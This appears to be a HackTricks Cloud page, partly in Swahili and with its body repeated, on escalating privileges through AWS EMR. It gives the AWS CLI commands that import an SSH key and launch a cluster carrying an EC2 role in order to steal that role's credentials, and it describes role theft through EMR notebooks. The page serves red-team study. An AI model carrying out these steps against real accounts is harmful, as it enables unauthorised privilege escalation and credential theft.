AWS - EMR Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EMR

Maelezo zaidi kuhusu EMR katika:

AWS - EMR Enum

`iam:PassRole`, `elasticmapreduce:RunJobFlow`

Mshambuliaji mwenye ruhusa hizi anaweza kuendesha klasta mpya ya EMR akishikilia majukumu ya EC2 na kujaribu kuiba hati zake. Kumbuka kwamba ili kufanya hivi unahitaji kujua funguo za ssh zilizopitishwa kwenye akaunti au kuagiza moja, na uweze kufungua bandari 22 kwenye nodi kuu (unaweza kuwa na uwezo wa kufanya hivi kwa kutumia sifa EmrManagedMasterSecurityGroup na/au ServiceAccessSecurityGroup ndani ya --ec2-attributes).

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Note how an EMR role is specified in --service-role and a ec2 role is specified in --ec2-attributes inside InstanceProfile. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role.

Potential Impact: Privesc to the EC2 service role specified.

`elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole`

With these permissions an attacker can go to the AWS console, create a Notebook and access it to steal the IAM Role.

Hata kama unachanganya jukumu la IAM kwa mfano wa notebook katika majaribio yangu niliona kwamba niliweza kuiba akiba inayosimamiwa na AWS na si akiba inayohusiana na jukumu la IAM.

Potential Impact: Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

`elasticmapreduce:OpenEditorInConsole`

Just with this permission an attacker will be able to access the Jupyter Notebook and steal the IAM role associated to it. The URL of the notebook is https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/

Hata kama unachanganya jukumu la IAM kwa mfano wa notebook katika majaribio yangu niliona kwamba niliweza kuiba akiba inayosimamiwa na AWS na si akiba inayohusiana na jukumu la IAM.

Potential Impact: Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Elastic Beanstalk Privesc NextAWS - EventBridge Scheduler Privesc

Last updated 3 days ago

EMR

Maelezo zaidi kuhusu EMR katika:

AWS - EMR Enum

iam:PassRole, elasticmapreduce:RunJobFlow

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Potential Impact: Privesc to the EC2 service role specified.

elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole

With these permissions an attacker can go to the AWS console, create a Notebook and access it to steal the IAM Role.

Hata kama unachanganya jukumu la IAM kwa mfano wa notebook katika majaribio yangu niliona kwamba niliweza kuiba akiba inayosimamiwa na AWS na si akiba inayohusiana na jukumu la IAM.

Potential Impact: Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

elasticmapreduce:OpenEditorInConsole

Hata kama unachanganya jukumu la IAM kwa mfano wa notebook katika majaribio yangu niliona kwamba niliweza kuiba akiba inayosimamiwa na AWS na si akiba inayohusiana na jukumu la IAM.

Potential Impact: Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile